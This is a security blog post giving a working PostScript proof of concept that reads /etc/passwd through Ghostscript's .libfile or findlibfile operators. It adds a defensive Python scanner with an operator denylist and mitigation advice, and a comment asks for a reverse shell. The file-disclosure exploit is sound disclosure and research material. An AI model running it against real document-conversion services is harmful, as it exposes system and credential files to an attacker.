Sunday, February 26, 2017

Weaponizing PostScript update

Just a short post to show a new method for reading files with PostScript. If the subject interests you, I suggest you check out my post "Weaponizing PostScript".

There's an alternative method for reading files (thanks, Tavis Ormandy!).
I've modified Tavis's code a bit; here's PoC code for reading files with .libfile:

%!PS
/Buf 1024 string def   % line buffer

/Courier               % name the desired font
8 selectfont           % choose the size in points and establish the font
/LM 72 def             % left margin
/ypos 800 def          % current y position
/lineheight 10 def     % height of a line
/newline {             % move down one line and back to the left margin
    ypos lineheight sub
    /ypos exch def
    LM ypos moveto
} def
LM ypos moveto

(/etc/passwd) .libfile {          % on success .libfile leaves the open file and true
    {
        dup Buf readline          % file string readline -> substring true | false
        {
            show                  % print the line
        }{
            showpage              % end of file: emit the page and stop
            quit
        } ifelse
        newline                   % next line
    } loop
} if

You can also use the findlibfile operator in exactly the same manner: replace ".libfile" with "findlibfile" and you should be able to read files.

The lesson of the story is that you can't prevent Local File Disclosure just by blocking the file operator. The above code works with Ghostscript and ps2pdf version 9.06 (the latest version in the Debian stable branch at the time of writing).
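To make that lesson concrete from the filtering side, here is an added Python example (my own code, not from this post, from Tavis Ormandy or from Ghostscript): a small PostScript tokenizer feeding two operator denylists, one that blocks only `file` and one that also blocks `.libfile` and `findlibfile`, run over constructed sample inputs shaped like the PoC above. The names `executable_tokens`, `find_file_ops` and `accepted_by` and the sample inputs are my own.

```python
# Added example (not from the post or from Ghostscript): an operator-denylist
# scan over PostScript source, showing why blocking only `file` is not enough.

# Characters that terminate a PostScript token: whitespace plus the PLRM delimiters.
DELIMS = frozenset(" \t\r\n\f\x00(){}[]<>/%")

# Naive policy: block only the `file` operator.
FILE_ONLY = frozenset({"file"})
# Broader policy: add the two alternatives shown in the post.
FILE_ACCESS_OPS = frozenset({"file", ".libfile", "findlibfile"})


def executable_tokens(ps):
    """Return the executable tokens (names and numbers) in a PostScript program.

    Comments, string literals (nested parens, backslash escapes), hex strings
    and literal names (/Name) are skipped: none of them executes an operator
    by themselves. This is a small tokenizer, not a full PostScript parser
    (ASCII85 strings, for instance, are not handled specially).
    """
    tokens = []
    i, n = 0, len(ps)
    while i < n:
        c = ps[i]
        if c == "%":                       # comment runs to end of line
            while i < n and ps[i] != "\n":
                i += 1
        elif c == "(":                     # string literal; parens nest
            depth = 0
            while i < n:
                ch = ps[i]
                if ch == "\\":             # escape: skip the backslash and next char
                    i += 2
                    continue
                if ch == "(":
                    depth += 1
                elif ch == ")":
                    depth -= 1
                    if depth == 0:
                        i += 1
                        break
                i += 1
        elif c == "<":                     # dict open `<<` or hex string `<...>`
            if ps.startswith("<<", i):
                i += 2
            else:
                end = ps.find(">", i)
                i = n if end < 0 else end + 1
        elif c == "/":                     # literal name: pushed, not executed
            i += 1
            while i < n and ps[i] not in DELIMS:
                i += 1
        elif c in DELIMS or c.isspace():   # structure chars and whitespace
            i += 1
        else:                              # executable name or number
            j = i
            while j < n and ps[j] not in DELIMS:
                j += 1
            tokens.append(ps[i:j])
            i = j
    return tokens


def find_file_ops(ps, blocked):
    """Blocked operators the program would execute, sorted for stable output."""
    return sorted(set(executable_tokens(ps)) & set(blocked))


def accepted_by(ps, blocked):
    """True if the denylist policy lets this input through."""
    return not find_file_ops(ps, blocked)


# Constructed samples: the .libfile read loop in the shape of the post's PoC,
# a read via the plain `file` operator, and a benign page.
SAMPLE_LIBFILE = """%!PS
/Buf 1024 string def
(/etc/passwd) .libfile {
  { dup Buf readline { show } { showpage quit } ifelse newline } loop
} if
"""
SAMPLE_FILE_OP = "%!PS\n(/etc/passwd) (r) file\n"
SAMPLE_BENIGN = "%!PS\n/Courier 12 selectfont 72 720 moveto (a (nested) str) show showpage\n"

if __name__ == "__main__":
    for label, src in [("libfile", SAMPLE_LIBFILE), ("file", SAMPLE_FILE_OP), ("benign", SAMPLE_BENIGN)]:
        print(f"{label:8} file-only policy: {'accept' if accepted_by(src, FILE_ONLY) else 'reject'}"
              f"  broader policy: {'accept' if accepted_by(src, FILE_ACCESS_OPS) else 'reject'}"
              f"  hits: {find_file_ops(src, FILE_ACCESS_OPS)}")
```

The file-only policy accepts the .libfile variant, which is the point of the post. Even the broader list is only a detection aid: a denylist of operator names has to track every file-access path the interpreter exposes, and it says nothing about what the interpreter itself permits. The durable mitigation is not to render untrusted PostScript outside the interpreter's sandbox mode (Ghostscript's -dSAFER) on a current version, and to run the conversion as an unprivileged user with no access to files worth disclosing.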

2 comments:

  1. Hi,

    I need to get a reverse shell or local file reading. None of the payloads you mentioned in the blog is working. PS version 3010.10. Can you please help me?

    1. Probably not. Most PostScript engines have been secured since these issues were exploitable.